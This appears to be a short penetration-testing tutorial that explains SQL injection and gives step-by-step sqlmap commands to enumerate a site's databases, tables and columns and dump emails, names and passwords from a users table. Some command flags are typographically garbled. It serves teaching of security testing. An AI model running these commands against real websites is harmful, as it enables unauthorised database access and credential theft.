SQL injection : it is an attack that exploits non-parametrized SQL queries in a database , so that the attacker can insert their own queries.
Sqlmap : This is a very powerful penetration test tool (open source) , it automates the discovery and exploitation of vulnerabilities to SQL injection attacks. It has many functions , and included features such as detecting DBMS, databases, tables , columns, retrieve data and even take control of a database.
Disclaimer – Our tutorials are designed to aid aspiring pen testers/security enthusiasts in learning new skills, we only recommend that you test this tutorial on a system that belongs to YOU. We do not accept responsibility for anyone who thinks it’s a good idea to try to use this to attempt to hack systems that do not belong to you
The following tutorial was made with a linux system ( kali linux ).
First we need a target to do this ,
go to your test website in this example we have used a PHP one, we then navigate between pages, when you see ” php? Id ” in the address bar , copy the address.
open your terminal and type this :
sqlmap –u http://www.site.com/product.php?catid=5 – -dbs
when sqlmap is done, it will tell you the Mysql version and some other information about the database.
At the end of the process , it will show you databases that it has found.
to see tables that are located at the database we gonna type :
sqlmap -u http://www.site.com/product.php?catid=5 -D acuart –tables
The result should be something like this :
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
Now we have a list of tables , we need to get columns so we gonna type :
sqlmap -u http://www.site.com/product.php?catid=5 -D acuart -T users –columns
The result should be like this :
last step we need to get data from columns , so the final command will look like this.
sqlmap -u http://www.site.com/product.php?catid=5 -D acuart -T users -C email,name,password -dump
and here’s the final result : we have got the name, mail and password: